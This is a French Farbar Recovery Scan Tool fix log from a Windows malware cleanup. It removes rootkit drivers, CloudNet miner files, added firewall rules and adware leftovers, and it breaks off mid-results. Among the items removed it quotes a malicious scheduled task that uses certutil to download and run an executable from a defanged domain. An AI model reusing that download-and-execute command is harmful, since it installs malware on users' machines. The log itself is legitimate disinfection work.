Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13-07-2019 Exécuté par nathan (13-07-2019 17:46:57) Run:6 Exécuté depuis C:\Users\nathan\Desktop Profils chargés: nathan (Profils disponibles: nathan) Mode d'amorçage: Normal ============================================== fixlist contenu: ***************** CreateRestorePoint: CloseProcesses: DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\ASC DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000 C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001 C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002 C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 C:\Windows\system32\drivers\8f00b204e9800998.sys C:\Windows\windefender.exe DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet DeleteKey: HKCU\SOFTWARE\EpicNet Inc. DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc. C:\Users\nathan\AppData\Roaming\EpicNet Inc unlock: C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\Winmon.sys unlock: C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonFS.sys unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys C:\Windows\System32\drivers\WinmonProcessMonitor.sys C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5BFEE7E8-5955-4B8A-BDD7-73E0EEC2F421} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{8CD74997-ACC6-45C8-B107-46E4F6D751A3} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6328ED04-3C49-48CD-B0BD-4126217142C8} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CEE6325F-CD04-472A-A536-FFF245610E26} Task: {0477D444-D9D4-43CB-BA0E-DDCB5A844393} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340 Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier Task: {DFB0A61A-AD16-40DE-864E-89AE6D3C641F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe CHR HomePage: Default -> hxxp://www.funnysearching.com/ S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [X] S4 IUFileFilter; pas de ImagePath U3 MBAMService; pas de ImagePath 2019-07-05 11:46 - 2019-07-07 11:49 - 000000000 ___HD C:\qtoie9GGJ2DkZWhu 2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft 2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited 2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft 2019-06-29 11:15 - 2019-07-05 11:40 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu 2019-07-05 11:40 C:\Windows\SysWOW64\yzrnpmcu AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA​ [16] EmptyTemp: ***************** Le Point de restauration a été créé avec succès. Processus fermé avec succès. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e) HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare => supprimé(es) avec succès HKLM\SOFTWARE\Wow6432Node\IObit\ASC => non trouvé(e) HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster => non trouvé(e) "C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000" => non trouvé(e) "C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001" => non trouvé(e) "C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002" => non trouvé(e) "C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins" => non trouvé(e) "C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)